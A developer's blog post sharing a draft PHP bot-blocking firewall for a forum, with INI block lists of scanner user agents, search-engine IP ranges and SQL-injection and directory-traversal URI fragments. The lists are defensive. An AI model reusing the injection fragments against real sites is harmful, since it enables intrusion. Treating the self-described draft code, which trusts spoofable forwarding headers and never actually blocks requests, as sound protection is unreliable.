Firewall.php

Since yesterday, I’ve been working on my forum script again (oh, you mean the one you’ve been working on since 2009?! Er… yes). The good news is that I’m finally getting somewhere. Bad news, I had to scrap everything I wrote so far since that turned out not to be the direction I wanted to go. The one sticking point was protecting the forum from all sorts of unsavory things the internet has an abundance of.

There are all sorts of plugins and apps available to protect your software from spammers and things, but most of them are hardly drop-in caliber. I’ve looked at Akismet (which isn’t as transparent as I had hoped), Fail2ban (which was too involved) and Bad Behavior. All in all, BB turned out to be the thing closest to what I was looking for, but it didn’t quite… match.

The premise behind Bad Behavior is that it’s a module/plugin or what-have-you, that sits listening to any requests to your site and piles through a blacklist of bad bots in the form of User Agent fragments and rubbish IP addresses. It optionally downloads blacklists and does host matching, but this aspect seems to be broken due to a PHP bug (surprise!). There’s also the problem of layout. BB seems a bit all-over-the-place as a piece of software. After scanning the code for a while, I realized it wasn’t really what I wanted or how I’d like to lay out my forum.

I needed something that can be deeply integrated into the forum so that I’ll have the option of pushing requests to a log of some sort, like BB does, but I also wanted to block users based on user name in other portions of the site. This required that I hack into BB to work and, considering the differing approaches, that wasn’t going to work. There should be two sections to this: A main firewall script and a model. The model is a “firewall entry object” that I can save to a database. Optionally, I also wanted it to have username and other information in the future so I haven’t finished it yet.

So last night, I sat down and sketched out a few things into a class. This is a non functional draft for what might be a firewall script I can reuse elsewhere. You can think of this script as me thinking out loud.

There are many different ways to do this so I’ll be scrubbing this in the future. But for now, here’s the overview.

Update: Well that was quick. This went from non-functional draft to semi-functional draft. I’ve also added a sketch of a FireEntry model which can show what would be saved if this was connected to a database. Also moved all the ‘lists’ to separate config files (‘Config/’ folder).

I haven’t had a chance to do a proper update yet since I’ve been extremely busy over the past month. As soon as the next few days are done, I’ll get back to more important things. I.E. Cabins!

<?php
/**
 * Bot and bad client blocking script (NON FUNCTIONAL DRAFT) 
 * This should NOT be considered foolproof as it uses a blacklist approach.
 * Parts of this code were inspired by the Bad Behavior plugin. No code was shared.
 *
 * @author Eksith Rodrigo <reksith at gmail.com>
 * @license http://opensource.org/licenses/ISC ISC License
 * @version 0.1
 */

class Firewall extends \Singleton {
	
	/**
	 * Message to return if a user is blocked
	 * Right now, it's identical to the router 'not found' message to avoid
	 * returning too much information.
	 */
	const DIE_MESSAGE = 'Couldn\'t find that';
	
	private static $botsIni = 'Config/verifiedbots.ini';
	
	private static $uasIni = 'Config/baduas.ini';
	
	private static $urisIni = 'Config/baduris.ini';
	
	
	/**
	 * @var object Firewall model object
	 */
	private $fire	= null;
	
	public $userhash = '';
	
	
	/**
	 * Forbidden request methods
	 */
	public static $rms = array(
		'trace', 'track', 'delete'
	);
	
	
	public static $searchEngines = array(
		'Google',
		'Bing',
		'Live',
		'MS Search',
		'MSN',
		'Inktomi',
		'Slurp',
		'SearchMonkey',
		'Yahoo',
		'Baidu',
		'Yandex'
	);
	
	/**
	 * Begin working as soon as the module is loaded.
	 * Starts from least expensive checks (IP) to most expensive (Headers)
	 */
	public function __construct() {
		$this->init();
		
		if ( empty( $this->fire->ip ) ) {
			$this->fire->ip		= $_SERVER['REMOTE_ADDR'];
			$this->fire->response	= 'Failed: Martian IP';
			$this->killReq( self::DIE_MESSAGE );
		}
		
		$this->checkRequest();
		$this->checkURI();
		$this->checkHeaders();
		$this->verifiedBotScan();
		
	}
	
	private function init() {
		$this->fire		= new \Models\FireEntry();
		$this->fire->method	= 
			strtolower( $_SERVER['REQUEST_METHOD'] );
		
		$this->fire->uri	= $this->getURI();
		$this->fire->headers	= $this->headers();
		
		// The User-Agent header may be absent entirely
		$this->fire->ua		= isset( $_SERVER['HTTP_USER_AGENT'] ) ?
						$_SERVER['HTTP_USER_AGENT'] : '';
		$this->fire->protocol	= $_SERVER['SERVER_PROTOCOL'];
		$this->fire->reqtime	= isset( $_SERVER['REQUEST_TIME'] ) ?
						$_SERVER['REQUEST_TIME'] : 
						time();

		$this->fire->ip		= $this->getIP();
	}
	
	private function checkRequest() {
		if ( in_array( $this->fire->method, self::$rms ) ) {
			$this->fire->response = 'Failed: Request check';
			$this->killReq( self::DIE_MESSAGE );
		}
	}
	
	private function checkURI() {
		$uris =  parse_ini_file( self::$urisIni );
		
		foreach( $uris['u'] as $uri ) {
			if ( false === stripos( 
				$this->fire->uri, $uri ) ) {
				continue;
			} else {
				$this->fire->response = 'Failed: URI check';
				$this->killReq( self::DIE_MESSAGE );
				break;
			}
		}
	}
	
	private function checkHeaders() {
		$headers = $this->fire->headers;
		
		/**
		 * Accept missing. Not acceptable.
		 */
		if ( $this->missing( $headers, 'Accept' ) ) {
			$this->fire->response = 'Failed: Accept header missing';
			$this->killReq( self::DIE_MESSAGE );
		}
		
		/**
		 * No UA or it's too short
		 */
		if ( $this->missing( $headers, 'User-Agent', 10 ) ) {
			$this->fire->response = 'Failed: User agent too small';
			$this->killReq( self::DIE_MESSAGE );
		}
		
		/**
		 * Shouldn't see MSIE *and* Windows ME/XP/2000 in the same 
		 * UA string
		 */
		if ( 
			$this->has( $headers, 'User-Agent', '; MSIE' ) && (
			$this->has( $headers, 'User-Agent', 'Windows 2000' ) || 
			$this->has( $headers, 'User-Agent', 'Windows ME' ) || 
			$this->has( 
				$headers, 'User-Agent', 'Windows XP' ) 
			)
		) {
			$this->fire->response = 'Failed: Fake MSIE bot';
			$this->killReq( self::DIE_MESSAGE );
		}
		
		/**
		 * Check against blacklist of User agents.
		 * This is the most expensive operation and should be 
		 * reserved for last.
		 */
		$uas =  parse_ini_file( self::$uasIni );
		if ( $this->has( $headers, 'User-Agent', $uas['u'] ) ) {
			$this->fire->response = 'Failed: Bad User Agent';
			$this->killReq( self::DIE_MESSAGE );
		}
	}
	
	/**
	 * It's opposites day! This function returns *true* if a particular 
	 * header value is completely missing, contains an empty string or
	 * is below the minimum length
	 */
	private function missing( &$h, $k, $min = 0 ) {
		if ( array_key_exists( $k, $h ) ) {
			if ( empty( $h[$k] ) ) {
				return true;
			}
			if ( $min > 0 && mb_strlen( $h[$k] ) < $min ) {
				return true;
			}
			return false;
		}
		
		return true;
	}
	
	/**
	 * Helper to see if a key exists in an array, has a component
	 * to search in the value or matches to an optional regular expression
	 */
	private function has( &$h, $k, $v = null, $regex = false ) {
		$has = array_key_exists( $k, $h );
		
		/**
		 * Only checking for key existence
		 */
		if ( null === $v || !$has ) {
			return $has;
		}
		
		if ( is_array( $v ) ) {
			foreach( $v as $name ) {
				// Look for the fragment inside the header value
				if ( false === stripos( $h[$k], $name ) ) {
					continue;
				} else {
					return true;
				}
			}
			
			/**
			 * Made it this far. The key wasn't in the array
			 */
			 return false;
		}
		
		/**
		 * The key value should be a regular expression match
		 */
		if ( $regex ) {
			return preg_match('/\b'. $v .'\b/i', $h[$k] );
		}
		
		if ( false === stripos( $h[$k], $v ) ) {
			return false;
		}
		
		return $has;
	}
	
	private function uaInSearchBot() {
		foreach( self::$searchEngines as $bot ) {
			if ( false === strpos( $this->fire->ua, $bot ) ) {
				continue;
			} else {
				return $bot;
			}
		}
		return null;
	}
	
	/**
	 * Check bot UA against IPs that are known for it
	 */
	private function verifiedBotScan() {
		if ( !$this->uaInSearchBot() ) {
			return;
		}
		$out	= null;
		$ua	= $this->fire->ua;
		
		$var =  parse_ini_file( self::$botsIni, true );
		$bots	= array_keys( $var );
		
		foreach( $bots as $b ) {
			$bua = explode( '_', $b );
			foreach( $bua as $a ) {
				
				/**
				 * User agent didn't match any bot aliases
				 */
				if ( false === strpos( $ua, $a ) ) {
					continue;
				} else {
					
					/**
					 * User agent claims to be a known bot
					 */
					$out = $this->rangeScan( 
						$var[$b]['i']
					);
					break; // Bot checking done
				}
			}
			
			/**
			 * We have a result (anything other than null)
			 */
			if ( null !== $out ) { break; }
		}
		
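		/**
		 * No alias matched (null) or the IP is inside a known 
		 * range for the claimed bot (true)
		 */
		if ( null === $out || true === $out ) {
			$this->fire->response = 'Passed';
			return;
		}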
		
		/**
		 * Didn't pass bot scan
		 */
		$this->fire->response = 'Failed: Spoofed popular bot';
		$this->killReq( self::DIE_MESSAGE );
	}
	
	/**
	 * Checks a given IP range in CIDR format
	 */
	private function rangeScan( $ips = array() ) {
		$out = false;
		foreach( $ips as $ip ) {
			if ( $out = $this->cidr( $ip, $this->fire->ip ) ) {
				/**
				 * IP in the given list  Exit loop
				 */
				break;
			}
		}
		return $out;
	}
	
	
	/**
	 * This may fail... hard!
	 * 
	 * @returns Gets (or rather extrapolates) IPv4/6 address from 
	 * 		relevant headers
	 */
	private function getIP() {
		
		$vars = array(
			'HTTP_CLIENT_IP', 
			'HTTP_X_FORWARDED_FOR', 
			'HTTP_X_FORWARDED', 
			'HTTP_X_CLUSTER_CLIENT_IP', 
			'HTTP_FORWARDED_FOR', 
			'HTTP_FORWARDED', 
			'REMOTE_ADDR'
		);
		
		foreach( $vars as $v ) {
			
			if ( true === array_key_exists( $v, $_SERVER ) )  {
				
				$ip = explode( ',', $_SERVER[$v] );
				
				foreach( $ip as $test ) {
					$test = trim( $test );
					if ( $this->checkIP( $test ) ) {
						return $test;
					}
				}
			}
		}
		
		/**
		 * If we made it this far, the IP was invalid
		 */
		return '';
	}
	
	private function formatIP4( $ip, $pad = '0' ) {
		$ip	= str_replace( '*', $pad, $ip );
		$bits	= null;
		$p	= strpos( $ip, '/' );
		if ( false !== $p ) { 
			$bits	= substr( $ip, $p ); // Keeps the leading '/'
			$ip	= substr( $ip, 0, $p );
		}
		
		$sr	= explode( '.', $ip );
		while( count( $sr ) < 4) {
			$sr[] = $pad;
		}
		$ip	= implode('.', $sr );
		
		return $ip . $bits;
	}
	
	private function matchIP4StartToEnd( $start, &$end ) {
		if ( empty( $end ) ) {
			$end	= array();
			$d	= explode( '.', $start );
			$c	= count( $d );
			
			for( $i = 0; $i < $c; $i++ ) {
				if ( empty( $d[$i] ) ) {
					$end[$i] = '255';
				} else {
					$end[$i] = $d[$i];
				}
			}
			
			// formatIP4() expects a string, not an array
			$end	= implode( '.', $end );
		} else {
			$end = str_replace( '*', '255', $end );
		}
		
		$end = $this->formatIP4( $end, '255' );
	}
	
	/**
	 * Checks if an IP is between an IPv4 range
	 */
	public function ip4Range( $start, $end, $ip ) {
		
		$start	= $this->formatIP4( $start, '0' );
		
		/**
		 * Bits E.G.'/16' was present. Send to CIDR validation
		 */
		if ( false !== strpos( $start, '/' ) ) {
			return $this->cidr( $start, $ip );
		}
		
		$this->matchIP4StartToEnd( $start, $end );
		
		$start	= ip2long( $start );
		$ip	= ip2long( $ip );
		$end	= ip2long( $end );
		
		if ( $start <= $ip && $end >= $ip ) {
			return true;
		}
		
		return false;
	}
	
	
	/**
	 * TODO: Create IPv6 matching
	 */
	private function ip6Range( $start, $end, $ip ) {
		return false;
	}
	
	
	/**
	 * CIDR format IP matching
	 */
	private function cidr( $r, $ip ) {
		list( $sub, $bits ) = explode( '/', $r );
		
		$ip	= ip2long( $ip );
		$sub	= ip2long( $sub );
		$mask	= ( -1 << ( 32 - $bits ) );
		
		$sub	&= $mask; // Fix inconsistencies
		
		return ( $ip & $mask ) == $sub;
	}
	 
	 /**
	  * Converts an IP4 address to IP6.
	  * Convenient to store as a single format
	  */
	private function ip4Toip6( $ip ) {
		if ( filter_var( $ip, 
			FILTER_VALIDATE_IP, FILTER_FLAG_IPV6 ) ) {
			return $this->cleanIPv6( $ip ); // Already IPv6
		}
		
		$ia = array_pad( explode( '.', $ip ), 4, 0 );
		$b1 = sprintf( '%04x', ( $ia[0] * 256 ) + $ia[1] );
		$b2 = sprintf( '%04x', ( $ia[2] * 256 ) + $ia[3] );
		
		// IPv4-mapped IPv6 address (::ffff:a.b.c.d) in fully expanded form
		return "0000:0000:0000:0000:0000:ffff:$b1:$b2";
	}
	 
	 /**
	  * Expand IPv6 to proper storage
	  * 
	  * @link http://php.net/manual/en/function.inet-pton.php
	  */
	private function cleanIPv6( $ip ) {
		$h	= unpack( "H*hex", inet_pton( $ip ) );
		$ip	= preg_replace( '/([A-Fa-f0-9]{4})/', "$1:", $h['hex'] );
		
		return substr( $ip , 0, -1 );
	}
	
	
	/**
	 * Checks for martians E.G. 10.0.0.0/8
	 * These should really be blocked at the router/switch
	 */
	private function checkIP( $ip ) {
		return filter_var( $ip, FILTER_VALIDATE_IP, 
			FILTER_FLAG_NO_RES_RANGE | FILTER_FLAG_NO_PRIV_RANGE );
	}
	
	private function killReq( $msg ) {
		$this->logReq();
		//echo $this->fire->response;
	}
	
	private function logReq() {
		$this->fire->save();
	}
	
	private function headers() {
		if ( function_exists( 'getallheaders' ) ) {
			return getallheaders();
		}
		
		$headers = array();
		
		foreach( $_SERVER as $k => $v ) {
			
			if ( 0 === strpos( $k, 'HTTP_' ) ) {
				
				/**
				 * Remove HTTP_ and turn '_' to spaces
				 */
				$hd	= substr( $k, 5 );
				$hd	= str_replace( '_', ' ', $hd );
				
				/**
				 * E.G. ACCEPT LANGUAGE to Accept-Language
				 */
				$uw	= ucwords( strtolower( $hd ) );
				$uw	= str_replace( ' ', '-', $uw );
				
				$headers[ $uw ] = $v; 
			}
		}
		
		return $headers;
	}
	
	private function getURI() {
		if ( isset( $_SERVER['REQUEST_URI'] ) ) {
			return $_SERVER['REQUEST_URI'];
		}
		
		$_SERVER['REQUEST_URI'] = substr( $_SERVER['PHP_SELF'], 1 );
		
		if ( isset($_SERVER['QUERY_STRING'] ) ) {
			$_SERVER['REQUEST_URI'] .= '?' . 
				$_SERVER['QUERY_STRING'];
		}
		
		return $_SERVER['REQUEST_URI'];
	}
}

The bad user agents ini file

; Partial (I.E. never ending) list of User Agents and partial matches
; Courtesy of the following:
; 
; http://bad-behavior.ioerror.us/
; https://github.com/bluedragonz/bad-bot-blocker/blob/master/.htaccess
; http://forum.joomla.org/viewtopic.php?t=494485
;
;Last count at 278 fragments checked


u[] = '**'
u[] = '\\\\'
u[] = '.NET CLR 1)'
u[] = '.NET CLR1'
u[] = '\r'
u[] = '<sc'
u[] = '; Widows'
u[] = '360Spider'
u[] = '8484 Boston Project'
u[] = 'a href='
u[] = 'Aboundex'
u[] = 'Acunetix'
u[] = 'adwords'
u[] = 'Alexibot'
u[] = 'AIBOT'
u[] = 'asterias'
u[] = 'attach'
u[] = 'autoemailspider'
u[] = 'BackDoorBot'
u[] = 'BackWeb'
u[] = 'Bad Behavior Test'
u[] = 'Bandit'
u[] = 'BatchFTP'
u[] = 'Bigfoot'
u[] = 'Black.Hole'
u[] = 'BlackHole'
u[] = 'BlackWidow'
u[] = 'blogsearchbot-martin'
u[] = 'BlowFish'
u[] = 'Bot mailto:craftbot@yahoo.com'
u[] = 'BotALot'
u[] = 'BrowserEmulator'
u[] = 'Buddy'
u[] = 'BuiltBotTough'
u[] = 'Bullseye'
u[] = 'BunnySlippers'
u[] = 'Cegbfeieh'
u[] = 'CheeseBot'
u[] = 'CherryPicker'
u[] = 'ChinaClaw'
u[] = 'Clearswift'
u[] = 'clipping'
u[] = 'Cogentbot'
u[] = 'Collector'
u[] = 'compatible ; MSIE'
u[] = 'compatible-'
u[] = 'CoralWebPrx'
u[] = 'core-project'
u[] = 'Copier'
u[] = 'CopyRightCheck'
u[] = 'cosmos'
u[] = 'Crescent'
u[] = 'Custo'
u[] = 'Diamond'
u[] = 'Digger'
u[] = 'DIIbot'
u[] = 'DISCo'
u[] = 'DittoSpyder'
u[] = 'discovery'
u[] = 'dragonfly'
u[] = 'Drip'
u[] = 'Download'
u[] = 'eCatch'
u[] = 'Easy'
u[] = 'Email'
u[] = 'Emulator'
u[] = 'Enchanc'
u[] = 'EroCrawler'
u[] = 'Exabot'
u[] = 'Express WebPictures'
u[] = 'Extrac'			; Extractors
u[] = 'EyeNetIE'
u[] = 'Fail'
u[] = 'Fatal'
u[] = 'FlashGet'
u[] = 'FHscan'
u[] = 'Firebird'		; Too old to be viable
u[] = 'flunky'
u[] = 'Foobot'
u[] = 'Forum Poster'
u[] = 'FrontPage'
u[] = 'Gecko/2525'
u[] = 'GetRight'
u[] = 'GetWeb!'
u[] = 'Go!Zilla'
u[] = 'Go-Ahead-Got-It'
u[] = 'gotit'
u[] = 'Grab'
u[] = 'Grafula'
u[] = 'grub'
u[] = 'hanzoweb'
u[] = 'Harvest'
u[] = 'Havij'
u[] = 'hloader'
u[] = 'HMView'
u[] = 'HttpProxy'
u[] = 'HTTrack'
u[] = 'humanlinks'
u[] = 'IlseBot'
u[] = 'Indy Library'
u[] = 'InfoNaviRobot'
u[] = 'InfoTekies'
u[] = 'Intelliseek'
u[] = 'InterGET'
u[] = 'Internet Explorer'	; *Not* IE. UA is likely a bot
u[] = 'Intraformant'
u[] = 'ISC Systems iRc'
u[] = 'Iria'
u[] = 'Java'
u[] = 'Jakarta'
u[] = 'Jenny'
u[] = 'JetCar'
u[] = 'JOC'
u[] = 'JustView'
u[] = 'Jyxobot'
u[] = 'Kenjin'
u[] = 'Keyword'
u[] = 'larbin'
u[] = 'Leacher'
u[] = 'LexiBot'
u[] = 'LeechFTP'
u[] = 'libwww-perl'
u[] = 'lftp'
u[] = 'libWeb/clsHTTP'
u[] = 'likse'
u[] = 'LinkScan'
u[] = 'LNSpiderguy'
u[] = 'LinkWalker'
u[] = 'Lobster'
u[] = 'Locator'
u[] = 'LWP'
u[] = 'Magnet'
u[] = 'Mag-Net'
u[] = 'MarkWatch'
u[] = 'Mata.Hari'		; Well, now I've seen everything
u[] = 'Memo'
u[] = 'Microsoft URL'
u[] = 'Microsoft.URL'
u[] = 'MIDown'
u[] = 'Ming Mong'
u[] = 'Missigua'
u[] = 'Mister'
u[] = 'MJ12bot/v1.0.8'
u[] = 'moget'
u[] = 'Morfeus'
u[] = 'Movable Type'		; Not the blog engine
u[] = 'Mozilla.*NEWT'
u[] = 'Mozilla/0'
u[] = 'Mozilla/1'
u[] = 'Mozilla/2'
u[] = 'Mozilla/3'
u[] = 'Mozilla/4.0('
u[] = 'Mozilla/4.0+(compatible;+'
u[] = 'Mozilla/4.0 (Hydra)'
u[] = 'MSIE 7.0;  Windows NT 5.2'
u[] = 'Murzillo'
u[] = 'MVAClient'
u[] = 'Navroad'
u[] = 'NearSite'
u[] = 'NetAnts'
u[] = 'NetMechanic'
u[] = 'NetSpider'
u[] = 'Net Vampire'
u[] = 'NetZIP'
u[] = 'Nessus'
u[] = 'NG'
u[] = 'NICErsPRO'
u[] = 'Nikto'
u[] = 'Ninja'
u[] = 'Nimble'
u[] = 'NPbot'
u[] = 'Nomad'
u[] = 'NutchCVS'
u[] = 'Nutscrape'
u[] = 'NextGen'
u[] = 'Octopus'
u[] = 'OmniExplorer'
u[] = 'Opera/9.64('
u[] = 'Offline'		 ; 'Offline' anything is a scraper
u[] = 'Openfind'
u[] = 'OutfoxBot'
u[] = 'Papa Foto'
u[] = 'pavuk'
u[] = 'pcBrowser'
u[] = 'Perman Surfer'
u[] = 'PHP'
u[] = 'Pockey'
u[] = 'PMAFind'
u[] = 'POE'
u[] = 'ProPowerBot'
u[] = 'psbot'
u[] = 'psycheclone'
u[] = 'Pump'
u[] = 'PussyCat'
u[] = 'PycURL'
u[] = 'Python-urllib'
u[] = 'QueryN'
u[] = 'RealDownload'
u[] = 'Reaper'
u[] = 'Recorder'
u[] = 'ReGet'
u[] = 'RepoMonkey'
u[] = 'RMA'
u[] = 'revolt'
u[] = 'Siphon'
u[] = 'SiteSnagger'
u[] = 'SlySearch'
u[] = 'SmartDownload'
u[] = 'Snake'
u[] = 'Snapbot'
u[] = 'sogou'
u[] = 'SpaceBison'
u[] = 'Spank'
u[] = 'spanner'
u[] = 'sqlmap'
u[] = 'Sqworm'
u[] = 'Stripper'
u[] = 'Sucker'
u[] = 'SuperBot'
u[] = 'Super Happy Fun'
u[] = 'SuperHTTP'
u[] = 'Surfbot'
u[] = 'suzuran'
u[] = 'Szukacz'
u[] = 'tAkeOut'
u[] = 'TightTwatBot'		; WTF?!
u[] = 'Titan'
u[] = 'Teleport'
u[] = 'Telesoft'
u[] = 'TrackBack'
u[] = 'True_Robot'
u[] = 'Turing Machine'
u[] = 'turingos'
u[] = 'TurnitinBot'
u[] = 'Ubuntu/9.25'
u[] = 'unspecified'
u[] = 'user'
u[] = 'User Agent:'
u[] = 'User-Agent:'
u[] = 'VoidEYE'
u[] = 'w3af'
u[] = 'Warning'
u[] = 'Web Image Collector'
u[] = 'WebaltBot'
u[] = 'WebAuto'
u[] = 'WebFetch'
u[] = 'WebGo'
u[] = 'WebmasterWorldForumBot'
u[] = 'WebSauger'
u[] = 'WebSite-X Suite'
u[] = 'Website eXtractor'
u[] = 'Website Quester'
u[] = 'Webster'
u[] = 'WebWhacker'
u[] = 'WebZIP'
u[] = 'Whacker'
u[] = 'Widow'
u[] = 'Winnie Poh'
u[] = 'Win95'			; These are too old. Likely bots
u[] = 'Win98'
u[] = 'WinME'
u[] = 'Win 9x 4.90'
u[] = 'Windows 3'
u[] = 'Windows 95'
u[] = 'Windows 98'
u[] = 'Windows NT 4'
u[] = 'Windows NT;'
u[] = 'Windows NT 5.0;)'
u[] = 'Windows NT 5.1;)'
u[] = 'Windows XP 5'
u[] = 'WISEbot'
u[] = 'WISENutbot'
u[] = 'Wordpress'		; Vulnerability scanner
u[] = 'WWWOFFLE'
u[] = 'Vacuum'
u[] = 'VCI'
u[] = 'Xaldon'
u[] = 'Xenu'
u[] = 'Zeus'
u[] = 'ZmEu'
u[] = 'Zyborg'

The verified search engines

; Whitelisted popular bots and corresponding IP addresses
; Note: This isn't exhaustive and will likely fail on a few 
; legitimate visits from these. This is mostly to prevent spoofers.
; 
; http://chceme.info/ips/
; http://www.webmasterworld.com/search_engine_spiders/4475767.htm
; http://www.internetofficer.com/web-robot/yahoo/

[Google]
i[] = '64.233.160.0/19'
i[] = '66.102.0.0/20' 
i[] = '66.249.64.0/19'
i[] = '72.14.192.0/18' 
i[] = '74.125.0.0/16' 
i[] = '209.85.128.0/17' 
i[] = '216.239.32.0/19'

[Bing_Live_MS Search_MSN]
i[] = '64.4.0.0/18'
i[] = '65.52.0.0/14'
i[] = '131.253.21.0/24'
i[] = '131.253.22.0/23'
i[] = '131.253.24.0/21'
i[] = '131.253.32.0/20'
i[] = '157.54.0.0/15'
i[] = '157.56.0.0/14'
i[] = '157.60.0.0/16'
i[] = '207.46.0.0/16'
i[] = '207.68.128.0/18'
i[] = '207.68.192.0/20'

[Inktomi_Slurp_SearchMonkey_Yahoo] 
i[] = '8.12.144.0/24'
i[] = '66.196.64.0/18'
i[] = '66.228.160.0/19'
i[] = '67.195.0.0/16'
i[] = '68.142.192.0/18'
i[] = '68.180.128.0/17'
i[] = '72.30.0.0/16'
i[] = '74.6.0.0/16'
i[] = '202.160.176.0/20'
i[] = '209.191.64.0/18'

[Baidu]
i[] = '61.135.190.1/32'		; CN...
i[] = '61.135.190.2/31'
i[] = '61.135.190.4/30'
i[] = '61.135.190.8/29'
i[] = '61.135.190.16/28'
i[] = '61.135.190.32/27'
i[] = '61.135.190.64/26'
i[] = '61.135.190.128/26'
i[] = '61.135.190.192/27'
i[] = '61.135.190.224/28'
i[] = '61.135.190.240/29'
i[] = '61.135.190.248/30'
i[] = '61.135.190.252/31'
i[] = '61.135.190.254/32'
i[] = '119.63.192.0/21'		; JP...
i[] = '119.63.192.128/26'
i[] = '119.63.192.192/27'
i[] = '119.63.192.224/28'
i[] = '119.63.192.240/29'
i[] = '119.63.192.248/30'
i[] = '119.63.192.252/31'
i[] = '119.63.192.254/32'
i[] = '119.63.193.0/24'
i[] = '119.63.196.1/32'
i[] = '119.63.196.2/31'
i[] = '119.63.196.4/30'
i[] = '119.63.196.8/29'
i[] = '119.63.196.16/28'
i[] = '119.63.196.32/27'
i[] = '119.63.196.64/26'
i[] = '119.63.198.0/24'
i[] = '119.63.199.103/32'
i[] = '123.125.64.0/18'		; CN...
i[] = '123.125.66.0/24'
i[] = '123.125.71.0/24'
i[] = '180.76.0.0/16'
i[] = '180.76.5.0/24'
i[] = '180.76.6.0/24'
i[] = '220.181.0.0/18'
i[] = '220.181.7.0/24'
i[] = '220.181.108.0/24'

[Yandex]
i[] = '77.88.0.0/18'
i[] = '77.88.22.0/23'
i[] = '77.88.24.0/21'
i[] = '77.88.24.0/22'
i[] = '77.88.28.0/22'
i[] = '77.88.36.0/23'
i[] = '77.88.42.0/23'
i[] = '77.88.44.0/24'
i[] = '77.88.50.0/23'
i[] = '87.250.224.0/19'
i[] = '87.250.230.0/23'
i[] = '87.250.252.0/22'
i[] = '93.158.128.0/18'
i[] = '93.158.137.0/24'
i[] = '93.158.144.0/21'
i[] = '93.158.144.0/23'
i[] = '93.158.146.0/23'
i[] = '93.158.148.0/22'
i[] = '95.108.128.0/17'
i[] = '95.108.128.0/24'
i[] = '95.108.152.0/22'
i[] = '95.108.216.0/23'
i[] = '95.108.240.0/21'
i[] = '95.108.248.0/23'
i[] = '178.154.128.0/17'
i[] = '178.154.160.0/22'
i[] = '178.154.164.0/23'
i[] = '199.36.240.0/22'
i[] = '213.180.192.0/19'
i[] = '213.180.204.0/24'
i[] = '213.180.206.0/23'
i[] = '213.180.209.0/24'
i[] = '213.180.218.0/23'
i[] = '213.180.220.0/23'
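
For a rough idea of how a sectioned list like this can be read and checked, here is a minimal standalone sketch. It is not part of the Firewall class: `ipInCidr()` and `claimedBotIsGenuine()` are hypothetical names, the INI text is a trimmed copy of two ranges from the list above, and it assumes 64-bit PHP 7.1 or newer and IPv4 only.

```php
<?php
// Trimmed copy of two sections from the list above (illustration only)
$ini = <<<'INI'
[Google]
i[] = '66.249.64.0/19'

[Bing_Live_MS Search_MSN]
i[] = '157.54.0.0/15'
INI;

/**
 * Hypothetical helper: true if an IPv4 address falls inside a CIDR block
 */
function ipInCidr( string $ip, string $cidr ): bool {
	if ( false === strpos( $cidr, '/' ) ) {
		return false;
	}
	list( $subnet, $bits ) = explode( '/', $cidr, 2 );
	
	$ipLong		= ip2long( $ip );
	$subLong	= ip2long( $subnet );
	$bits		= (int) $bits;
	
	if ( false === $ipLong || false === $subLong || $bits < 0 || $bits > 32 ) {
		return false;
	}
	
	// Keep the mask to 32 bits (assumes 64-bit integers)
	$mask = ( 0xFFFFFFFF << ( 32 - $bits ) ) & 0xFFFFFFFF;
	
	return ( $ipLong & $mask ) === ( $subLong & $mask );
}

/**
 * Hypothetical helper: null if the UA doesn't claim to be a listed bot,
 * true if it does and the IP is in a listed range, false if it's a spoof
 */
function claimedBotIsGenuine( string $ua, string $ip, array $bots ): ?bool {
	foreach ( $bots as $aliases => $entry ) {
		// Section names hold aliases separated by underscores
		foreach ( explode( '_', $aliases ) as $alias ) {
			if ( false === stripos( $ua, $alias ) ) {
				continue;
			}
			foreach ( $entry['i'] as $range ) {
				if ( ipInCidr( $ip, $range ) ) {
					return true;
				}
			}
			return false;
		}
	}
	return null;
}

// Second parameter 'true' keeps the [section] names as array keys
$bots = parse_ini_string( $ini, true );
```

Keeping the three outcomes separate (null, true, false) makes it harder to mix up "not a bot at all" with "a bot from the right address", which are both passes but for different reasons.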

The ‘Bad URIs’

; URL fragments indicating possible SQL injection or 
; directory traversal attempts. Part of the matches from Bad Behavior
; 
; http://www.technicalinfo.net/papers/URLEmbeddedAttacks.html


u[] = '0x31303235343830303536'
u[] = '../'
u[] = '..\\'
u[] = '..%2F'
u[] = '..%u2216'
u[] = '?=PHP'				; Attempt to reveal PHP version
u[] = '%60information_schema%60'
u[] = ';DECLARE%20@'
u[] = '%7e'
u[] = '%3cscript%20'
u[] = '%27%3b%20'
u[] = '%22http%3a%2f%2f'
u[] = '%255c'
u[] = '%%35c'
u[] = '%25%35%63'
u[] = '%c0%af'
u[] = '%c1%9c'
u[] = '%c1%pc'
u[] = '%c0%qf'
u[] = '%c1%8s'
u[] = '%c1%1c'
u[] = '%c1%af'
u[] = '%e0%80%af'
u[] = '%u'
u[] = '+%2F*%21'
u[] = '%27--'
u[] = '%27 --'
u[] = '%27%23'
u[] = '%27 %23'
u[] = 'benchmark%28'
u[] = 'insert+into+'
u[] = 'r3dm0v3'
u[] = 'select+1+from'
u[] = 'union+all+select'
u[] = 'union+select'
u[] = 'waitfor+delay+'
u[] = 'w00tw00t'

And, finally, a ‘FireEntry’ example model. This can show what variables would be saved to the db.

<?php


namespace Models;

class FireEntry extends base {
	
	/**
	 * @var string Assigned label (not UA, but what the firewall determined)
	 */
	public $label	= 'unknown';
	
	
	/**
	 * @var string Request method
	 */
	public $method	= '';
	
	
	/**
	 * @var string Accessed URI
	 */
	public $uri	= '';
	
	
	
	/**
	 * @var string Accessing IP
	 */
	public $ip	= '';
	
	
	
	/**
	 * @var string User Agent string
	 */
	public $ua	= '';
	
	
	
	/**
	 * @var string Complete header string
	 */
	public $headers	= '';
	
	
	
	/**
	 * @var string Requested server protocol
	 */
	public $protocol = '';
	
	
	
	/**
	 * @var string Firewall action (blocked, passed etc...)
	 */
	public $response = '';
	
	
	
	/**
	 * @var string Time the request was received
	 */
	public $reqtime = '';
	
	
	public function __construct( array $data = null ) {
		
		if ( empty( $data ) ) {
			return;
		}
		
		foreach ( $data as $field => $value ) {
			$this->$field = $value;
		}
	}
	
	
	public function save() {
		$time	= parent::_myTime( time() );
		$row	= 0;
		
		$headers='';
		if ( !empty( $this->headers ) ) {
			
		}
		if ( empty( $this->reqtime ) ) {
			$this->reqtime = $time;
		} else {
			$this->reqtime = parent::_myTime( $this->reqtime );
		}
		
		$params = array(
			'label'		=> $this->label,
			'method'	=> $this->method,
			'uri'		=> $this->uri,
			'ip'		=> $this->ip,
			'ua'		=> $this->ua,
			'headers'	=> $headers,
			'protocol'	=> $this->protocol,
			'reqtime'	=> $this->reqtime,
			'updated_at'	=> $time
		);
		
		var_dump( $params );
		//parent::put( 'firewall', $params );
	}
	
	
	
	public static function find( $filter = array() ) {
		// TODO: Filter
		
	}
	
	
